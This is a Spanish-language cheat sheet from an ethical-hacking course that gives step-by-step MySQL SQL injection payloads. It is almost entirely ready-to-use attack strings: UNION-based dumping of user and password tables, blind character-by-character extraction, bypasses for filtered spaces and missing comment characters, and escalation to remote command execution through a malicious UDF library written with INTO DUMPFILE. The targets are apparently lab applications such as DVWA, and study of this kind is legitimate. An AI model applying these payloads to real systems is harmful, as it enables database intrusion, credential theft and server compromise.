=====================================================
      SQL INJECTION - PASO A PASO (MySQL)
      Autor: D1n0 (Alejandro Mamán) | INSO3A
      Asignatura: Hacking Ético
=====================================================

=== PASO 1: DETECTAR VULNERABILIDAD ===

Probar:
'
' -- -
' OR '1'='1' -- -
1' AND '1'='1' -- -
1' AND '1'='2' -- -   (comparar respuestas)


=== PASO 2: CONTAR COLUMNAS ===

1' ORDER BY 1-- -
1' ORDER BY 2-- -
1' ORDER BY 3-- -     (subir hasta error)

NOTA: ORDER BY 1 SIEMPRE funciona independientemente del numero de columnas,
por eso no sirve como referencia. El primer error te da el numero real.
Si ORDER BY da problemas, probar con #:
1' ORDER BY 1#
1' ORDER BY 2#

Confirmar con UNION (usar NULL, no numeros - ver nota abajo):
1' UNION SELECT NULL-- -
1' UNION SELECT NULL,NULL-- -
1' UNION SELECT NULL,NULL,NULL-- -

[!] IMPORTANTE: Usar siempre NULL en vez de 1,2,3
    NULL es compatible con cualquier tipo de columna (string, int, etc.)
    Un entero como 1 puede dar error de tipos si la columna espera string.


=== PASO 3: IDENTIFICAR COLUMNAS VISIBLES ===

1' UNION SELECT 'columna1','columna2'-- -
(ver que etiqueta aparece en cada campo de la respuesta)


=== PASO 4: INFO BASICA ===

1' UNION SELECT user(),database()-- -
1' UNION SELECT version(),null-- -
1' UNION SELECT @@version_compile_os,@@version_compile_machine-- -  (OS y arquitectura 32/64)
1' UNION SELECT @@plugin_dir,null-- -                               (directorio de plugins MySQL)


=== PASO 5: LISTAR BASES DE DATOS ===

1' UNION SELECT schema_name,null FROM information_schema.schemata-- -

[!] ERROR COMUN: el campo se llama schema_name, NO schemata_name


=== PASO 6: LISTAR TABLAS ===

De una BD concreta:
1' UNION SELECT table_name,null FROM information_schema.tables WHERE table_schema='nombre_bd'-- -

De todas las BDs a la vez:
1' UNION SELECT table_schema,table_name FROM information_schema.tables-- -

De la BD actual:
1' UNION SELECT table_name,null FROM information_schema.tables WHERE table_schema=database()-- -


=== PASO 7: LISTAR COLUMNAS DE UNA TABLA ===

1' UNION SELECT column_name,null FROM information_schema.columns WHERE table_name='users'-- -


=== PASO 8: EXTRAER DATOS ===

1' UNION SELECT user,password FROM dvwa.users-- -

Especificar BD.tabla cuando no estas en esa BD:
1' UNION SELECT user,password FROM mysql.user-- -

Concatenar varios campos:
1' UNION SELECT CONCAT(user,':',password),null FROM dvwa.users-- -


=== PASO 9: VERIFICAR PRIVILEGIOS (para escalada) ===

Usuario y BD actuales:
1' UNION SELECT user(),database()-- -

Privilegio de escritura de ficheros:
1' UNION SELECT file_priv,null FROM mysql.user WHERE user='root'-- -
(Y = tiene privilegios, N = no tiene)

Directorio de plugins:
1' UNION SELECT @@plugin_dir,null-- -

Version y arquitectura del servidor:
1' UNION SELECT version(),null-- -
1' UNION SELECT @@version_compile_os,@@version_compile_machine-- -


=====================================================
            BLIND - PASO A PASO
=====================================================

=== PASO 1: CONFIRMAR BLIND ===

1' AND 1=1-- -    (respuesta normal)
1' AND 1=2-- -    (respuesta diferente)


=== PASO 2: LONGITUD DE DATABASE() ===

1' AND length(database())=1-- -
1' AND length(database())=2-- -
...hasta TRUE


=== PASO 3: EXTRAER DATABASE() CARACTER A CARACTER ===

1' AND substring(database(),1,1)='a'-- -
1' AND substring(database(),1,1)='b'-- -
...hasta TRUE, luego posicion 2, 3, etc.


=== PASO 4: CONTAR BASES DE DATOS ===

1' AND (SELECT count(schema_name) FROM information_schema.schemata)=1-- -
1' AND (SELECT count(schema_name) FROM information_schema.schemata)=5-- -


=== PASO 5: LONGITUD NOMBRE BD (posicion X) ===

1' AND (SELECT length(schema_name) FROM information_schema.schemata LIMIT 0,1)=18-- -
1' AND (SELECT length(schema_name) FROM information_schema.schemata LIMIT 1,1)=4-- -


=== PASO 6: EXTRAER NOMBRE BD CARACTER A CARACTER ===

1' AND substring((SELECT schema_name FROM information_schema.schemata LIMIT 2,1),1,1)='d'-- -
1' AND substring((SELECT schema_name FROM information_schema.schemata LIMIT 2,1),2,1)='v'-- -


=== PASO 7: REPETIR PARA TABLAS ===

Contar tablas:
1' AND (SELECT count(table_name) FROM information_schema.tables WHERE table_schema='dvwa')=2-- -

Longitud nombre tabla:
1' AND (SELECT length(table_name) FROM information_schema.tables WHERE table_schema='dvwa' LIMIT 0,1)=5-- -

Extraer nombre:
1' AND substring((SELECT table_name FROM information_schema.tables WHERE table_schema='dvwa' LIMIT 0,1),1,1)='u'-- -


=== PASO 8: REPETIR PARA COLUMNAS Y DATOS ===

(mismo proceso con information_schema.columns y luego la tabla objetivo)


=====================================================
            BYPASS - ESPACIOS FILTRADOS
=====================================================

Sustituir espacios por:

%09  = Tab (el mas fiable)
%0a  = Newline (salto de linea)
%0b  = Tab vertical
%0c  = Form feed
/**/  = Comentario vacio
+    = Espacio (a veces)

Ejemplo con %09:
?name=root'%09OR%09'1'='1
?name=x'%09UNION%09SELECT%091,2,3,4,'5


=====================================================
         BYPASS - SIN COMENTARIOS (-- -)
=====================================================

Cuando no puedes usar -- - o # para comentar el resto.

TRUCO: La comilla final de la consulta original cierra tu payload.

Consulta original:
SELECT * FROM users WHERE name='INPUT'

PAYLOAD (ultimo valor con comilla antes, no despues):
?name=x'%09UNION%09SELECT%091,2,3,4,'5

Resultado:
SELECT * FROM users WHERE name='x' UNION SELECT 1,2,3,4,'5'
                                                         ^ esta la pone la consulta original

FLUJO COMPLETO SIN COMENTARIOS:

1. Detectar:
?name=root'%09OR%09'1'='1

2. Contar columnas (probar hasta que funcione):
?name=x'%09UNION%09SELECT%09'1
?name=x'%09UNION%09SELECT%091,'2
?name=x'%09UNION%09SELECT%091,2,'3
?name=x'%09UNION%09SELECT%091,2,3,'4
?name=x'%09UNION%09SELECT%091,2,3,4,'5

3. Info basica:
?name=x'%09UNION%09SELECT%091,database(),user(),4,'5

4. Listar BDs:
?name=x'%09UNION%09SELECT%091,schema_name,3,4,'5'%09FROM%09information_schema.schemata%09WHERE%09'1'='1

5. Listar tablas (la comilla de 'exercises la cierra la consulta):
?name=x'%09UNION%09SELECT%091,table_name,3,4,'5'%09FROM%09information_schema.tables%09WHERE%09table_schema='exercises

6. Listar columnas:
?name=x'%09UNION%09SELECT%091,column_name,3,4,'5'%09FROM%09information_schema.columns%09WHERE%09table_name='users

7. Extraer datos:
?name=x'%09UNION%09SELECT%091,name,passwd,4,'5'%09FROM%09users%09WHERE%09'1'='1


=====================================================
         ESCALADA A RCE VIA UDF (MySQL)
=====================================================

Requisitos:
- Usuario MySQL con privilegios root
- file_priv = Y  (verificar con paso 9 arriba)
- Conocer @@plugin_dir
- Arquitectura del servidor (32/64 bits via @@version_compile_machine)

Flujo:
1. Verificar privilegios y arquitectura (ver PASO 9)
2. Buscar libreria UDF maliciosa en Kali:
   find / -name "lib_mysqludf_sys*" 2>/dev/null
3. Seleccionar la correcta segun arquitectura (32/64 bits)
4. Escribir la libreria .so en @@plugin_dir via INTO DUMPFILE
5. Registrar la funcion: CREATE FUNCTION sys_exec RETURNS INT SONAME 'udf.so'
6. Ejecutar comandos: SELECT sys_exec('id')

Tablas de mysql relevantes para UDF:
- mysql.user     -> usuarios y privilegios
- mysql.func     -> funciones UDF registradas
- mysql.plugin   -> plugins cargados

=====================================================
